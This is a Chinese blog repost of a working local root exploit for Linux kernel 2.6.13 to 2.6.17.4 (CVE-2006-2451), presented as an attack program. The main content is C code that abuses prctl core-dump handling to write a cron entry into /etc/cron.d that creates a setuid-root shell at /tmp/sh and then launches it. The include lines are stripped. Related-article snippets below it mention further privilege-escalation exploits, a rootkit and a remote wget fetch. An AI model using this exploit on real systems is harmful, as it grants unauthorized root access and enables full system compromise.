Linux Kernel2.6x 最新本地溢出代码(转)

最新推荐文章于 2021-05-25 19:51:10 发布
最新推荐文章于 2021-05-25 19:51:10 发布
阅读量125 收藏
点赞数
Linux Kernel2.6x 最新本地溢出代码(转)[@more@]工具分类:攻击程序
运行平台:Linux
工具大小:1684
Bytes文件MD5 :f011910d6400652177c3b2e66bfb7144
工具来源:http://www.rs-labs.com/
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00tBy: dreyer & RoMaNSoFt[ 10.Jul.2006 ]
CODE:
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload=" SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core ";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t ");
printf("By: dreyer & RoMaNSoFt ");
printf("[ 10.Jul.2006 ] ");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry ");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **) ");
sleep(62);

printf("[*] Running shell (remember to remove /tmp/sh when finished) ... ");
system("/tmp/sh -p");
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10617542/viewspace-960173/,如需转载,请注明出处,否则将追究法律责任。

0
0
上一篇: Redhat9上配置DNS(转)
下一篇: JAVA基础:再谈在Java中使用枚举(转)
user_pic_default.png
请登录后发表评论 登录
全部评论
<%=items[i].createtime%>

<%=items[i].content%>

<%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%=items[i].items.items[j].createtime%> 回复

<%=items[i].items.items[j].username%>   回复   <%=items[i].items.items[j].tousername%><%=items[i].items.items[j].content%>

<%}%> <%if(items[i].items.total > 5) { %>
还有<%=items[i].items.total-5%>条评论 ) data-count=1 data-flag=true>点击查看
<%}%>
<%}%> <%}%>
BSDLite
  • 博文量
    1873
  • 访问量
    3795501

最新文章

支持我们 作者招募 用户协议 FAQ Contact Us

北京盛拓优讯信息技术有限公司. 版权所有  京ICP备09055130号-4  北京市公安局海淀分局网监中心备案编号:11010802021510

广播电视节目制作经营许可证(京) 字第1234号 中国互联网协会会员

转载于:http://blog.itpub.net/10617542/viewspace-960173/

cuikeng1956
关注
linux内核关闭igmp,Linux kernel IGMP多个安全漏洞
weixin_31874577的博客
04-29 937
受影响系统:Linux kernel 2.6.9Linux kernel 2.6.8Linux kernel 2.6.7Linux kernel 2.6.6Linux kernel 2.6.5Linux kernel 2.6.4Linux kernel 2.6.3Linux kernel 2.6.2Linux kernel 2.6.1Linux kernel 2.6Linux kernel 2.4...
linux内核时间片调度实现详解(基于ARM处理器)
arm7star的博客
11-28 9489
本文基于linux-4.5.3对内核公平调度之时间片相关函数主要流程做了详细介绍,其他细节请参考其他书籍或源码。
linux提权工具利用2.6内核漏洞
12-27
wunderbar_emporium-3.tgz linux提权工具 linux提权 2.6内核漏洞
C语言写的一段溢出代码
weixin_30682127的博客
11-04 338
/* C语言写的一段溢出代码,懂的朋友就不用看了,不懂的朋友就看看效果好了,呵呵。。。 想知道说法,那么就去看看函数调用的本质和栈段相关的知识点。内容比较繁杂,因为这 需要相关的汇编知识。我就不多说了,有不明白的地方也可以在本文回复提出,本人尽量 抽时间回答。 */ #include <stdio.h> #include <stdlib.h&g...
Linux Kernel 2.6x 本地溢出代码 今天测试了一下,效果不错
weixin_33857230的博客
07-17 72
/*****************************************************/ /*Localr00tExploitfor:*/ /*LinuxKernelPRCTLCoreDumpHandling*/ /*(BID18874...
Linux 2.6.x平台下后门程序
cnbird's blog
02-25 964
wnps-0.26-beta2精简测试版WNPS 简介:WNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。它的意思是wnps is not poc shell,我的意图在于将它设计成一个可用于实战的linux rootkit。它最初的想法来自enyelkm,我对作者的开源精神深表感激。开发平台:2.6.9-5.ELWNPS 功能特点:-=-=精简测试版只有文件
代码实现堆溢出、栈溢出、永久代溢出、直接内存溢出
热门推荐
根号三
03-18 2万+
1. 栈溢出(StackOverflowError) 2. 堆溢出(OutOfMemoryError:Java heap space) 3. 永久代溢出(OutOfMemoryError: PermGen space) 4. 直接内存溢出
Linux提权全剧终
Ms08067安全实验室
03-11 1192
喜欢就关注我吧,订阅更多最新安全知识文章来源|MS08067 内网安全知识星球本文作者:非正常接触(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067这里介绍一些Linux...
Linux 2.6内核新变化
kerson的专栏
05-23 1808
<br />Linux 2.6内核新变化2010/06/17 01:18 A.M.<br />http://www.lupaworld.com/action_viewstutorial_itemid_3196.html<br />Linux 内核的开发已经经历了一个漫长的过程,最初是 Linus Torvalds于1991年发布的原始的0.1版本,这个版本中包括一个基本的调度器、IPC(进程间通信)和内存管理算法。而现在它已经是一个以往操作系统的实用的替代品,在市场上表现出了强大的竞争力。越来越多的政府机构
Linux启动过程简略分析-start_kernel部分代码阅读
03-22 1425
Linux启动过程分析简略分析, start_kernel部分代码阅读
TQIMAX6q调试笔记三:EETI的egalax-i2c触摸屏移植
liming8754955的博客
11-23 2370
一:修改设备树: 1.路径:kernel_imx\arch\arm\boot\dts\imx6qdl.dtsi 2.添加如下代码: i2c1: i2c@021a0000 { #address-cells = ; #size-cells = ; compatible = "fsl,imx6q-i2c", "fsl,imx21-i2c"; reg = ; interrupts = ;
这是最新的0day Linux 2.4.x / 2.6.x umount exploit (已公开)
0ffs3t
10-26 1344
这算个最新的目标较多。今年1月的。 0day linux exploit jan 9th 2011 tested on latest centos5/5.5 and debian lenny  http://stablehost.us/exploits/umount should work on some other distributions exploits CIFS mount
linux内核漏洞提权过程
focus on security
05-25 2422
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3. 检测当前用户权限 4. 列举Suid文件 5. 查看已经安装的包,程序,运行的服务,过期的版本可能有漏洞
linux各版本对应溢出漏洞总结(溢出代码)
weixin_33895657的博客
08-09 442
记录一下。2.4.17 newlocal kmod 2.4.18 brk brk2 newlocal kmod km.2 2.4.19 brk brk2 newlocal kmod km.2 2.4.20 ptrace kmod ptrace-kmod km.2 brk brk2 2.4.21 km.2 brk ...
linux 2.6 cpu漏洞,[载]Linux kernel 2.6.x udev 本地安全漏洞
weixin_39635648的博客
05-12 177
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique# by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a 'cat /proc/net/netlink'# and set the first arg to thi...
linux本地自动溢出获取root权限工具
瞎几把学
11-26 1248
清理了一些连接因为不能访问,或者清除了我的连接的。。。。。留言的连接我已经做好了! 下面应该是是某个国外黑客溢出用的 http://safilooptics.ge/tmp/aa.txt   [python] view plaincopyprint? {  system("wget http://standproje.com/modules/mod_footer/
毕业设计论文SpringBoot+Vue毕业生信息招聘平台.docx
10-16
毕业设计论文
PHP-006教务选课学生选课成绩管理系统毕业课程源码设计+论文资料
最新发布
10-16
编号:306 作为php高校院务学生选课成绩管理系统,在系统中有学生信息和教师信息以及课程信息需要管理员分类管理。 (1)学生管理:管理员登录系统后可以添加学生,查询学生,修改学生,删除学生信息。 (2)教师管理:管理员登录系统后可以添加教师,查询教师,修改教师,删除教师信息。 (3)课程管理:管理员登录系统后可以登记新的课程信息,查询修改课程信息,删除课程信息. (4)授课信息管理:管理员登录系统后可以分配课程由哪个老师教授。 (5)班级信息管理:管理员可以在系统其他功能运行前先把班级信息设置好。 (6)选课管理:学生登录系统后可以对课程进行选择。 (7)成绩管理:教师登录系统后,可以查询自己教授的课程并对学生的成绩打分。 (8)系统管理: 修改登录密码,关于系统说明
在线教育视频&JAVA&基于SpringBoot的在线视频教育平台的设计与实现(毕业论文+开题)
10-16
本系统采用的数据库是Mysql,使用SpringBoot框架开发, 使用在线视频教育平台分为管理员和用户、教师三个角色的权限模块。 管理员所能使用的功能主要有:首页、个人中心、用户管理、教师管理、课程信息管理、课程类型管理、我的收藏管理、系统管理、订单管理等。 用户可以实现首页、个人中心、课程信息管理、我的收藏管理、订单管理等。 教师可以实现首页、个人中心、课程信息管理、我的收藏管理等。
Linux Kernel 2.6进程调度优化解析
"Linux Kernel 2.6进程调度分析" Linux Kernel 2.6引入了一系列改进,以解决其前身2.4内核在进程调度方面的不足。在2.4内核中,调度算法的复杂度为O(n),这意味着随着系统负载增加,调度的效率会下降。此外,只有一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值